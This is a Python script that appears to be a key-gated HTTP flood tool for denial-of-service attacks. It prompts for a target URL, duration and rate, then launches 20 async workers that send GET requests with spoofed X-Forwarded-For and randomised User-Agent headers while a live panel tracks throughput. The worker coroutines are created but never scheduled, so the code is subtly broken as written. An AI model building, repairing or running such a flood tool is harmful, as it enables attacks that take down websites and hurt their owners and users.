import asyncio, aiohttp, requests, time, os, sys
from datetime import datetime
from rich.console import Console
from rich.panel import Panel
from rich.table import Table
from rich.live import Live
from rich.layout import Layout
from rich.text import Text

console = Console()
stats = {"total": 0, "success": 0, "failed": 0, "latency": 0, "rps": 0}

def get_banner():
    # ASCII Art JKSY untuk tampilan angker
    banner = """
[bold red]    ____          _______  ______驰
   / __ \        / / ___/ / ____/
  / / / /  __   / /\__ \ / / __  
 / /_/ /  /_/  / /___/ // /_/ /  
/_____/       /_//____/ \____/   [/]
[bold white]   ELITE EDITION v9.3 - AUTHORITY BY JOKESKYLS[/]
    """
    return banner

def generate_log_table(target):
    # Membuat tabel statistik yang rapi dan simetris
    table = Table(border_style="red", expand=True)
    table.add_column("METRIC", style="cyan", justify="center")
    table.add_column("VALUE", style="white", justify="center")
    
    table.add_row("TARGET", f"[bold yellow]{target}[/]")
    table.add_row("TOTAL REQS", str(stats["total"]))
    table.add_row("RPS", f"[bold magenta]{stats['rps']}[/]")
    table.add_row("LATENCY", f"{stats['latency']:.0f}ms")
    table.add_row("SUCCESS", f"[bold green]{stats['success']}[/]")
    table.add_row("FAILED", f"[bold red]{stats['failed']}[/]")
    return table

async def attack_logic(url, rps_limit):
    timeout = aiohttp.ClientTimeout(total=5)
    delay = 1 / (rps_limit / 20) if rps_limit > 0 else 0
    async with aiohttp.ClientSession(timeout=timeout) as session:
        while True:
            t1 = time.perf_counter()
            try:
                headers = {"User-Agent": f"D-JKSY/9.3-{time.time()}", "X-Forwarded-For": f"1.{time.time()}"}
                async with session.get(url, headers=headers) as resp:
                    stats["latency"] = (time.perf_counter() - t1) * 1000
                    stats["total"] += 1
                    if resp.status < 400: stats["success"] += 1
                    else: stats["failed"] += 1
            except:
                stats["total"] += 1
                stats["failed"] += 1
            if delay > 0: await asyncio.sleep(delay)

async def main():
    # 1. AUTH SYSTEM
    os.system('cls' if os.name == 'nt' else 'clear')
    console.print(get_banner(), justify="center")
    
    try:
        r = requests.get("https://raw.githubusercontent.com/iamkhy11/d-jksy/main/keys.txt", timeout=10)
        keys = [k.strip() for k in r.text.splitlines()]
    except:
        console.print("[red][!] Authority Server Offline![/]")
        return

    key_input = console.input("\n[bold white]ACCESS KEY : [/]").strip()
    if key_input not in keys:
        console.print("[bold red][!] UNKNOWN KEY. ACCESS DENIED.[/]")
        return

    # 2. INPUT PARAMETERS
    console.print("\n[bold green][+] AUTHORITY GRANTED[/]")
    target = console.input("[bold white]TARGET URL : [/]")
    duration = int(console.input("[bold white]TIME (SEC) : [/]"))
    rps_val = int(console.input("[bold white]RPS LIMIT  : [/]"))

    # 3. LIVE MONITORING
    os.system('cls' if os.name == 'nt' else 'clear')
    console.print(get_banner(), justify="center")
    
    workers = [attack_logic(target, rps_val) for _ in range(20)]
    
    start_time = time.time()
    last_total = 0
    
    with Live(generate_log_table(target), refresh_per_second=4) as live:
        while time.time() - start_time < duration:
            # Hitung RPS tiap detik
            stats["rps"] = stats["total"] - last_total
            last_total = stats["total"]
            
            live.update(generate_log_table(target))
            await asyncio.sleep(1)

    console.print("\n[bold red][!] OPERATION COMPLETE. DISCONNECTING...[/]")

if __name__ == "__main__":
    asyncio.run(main())
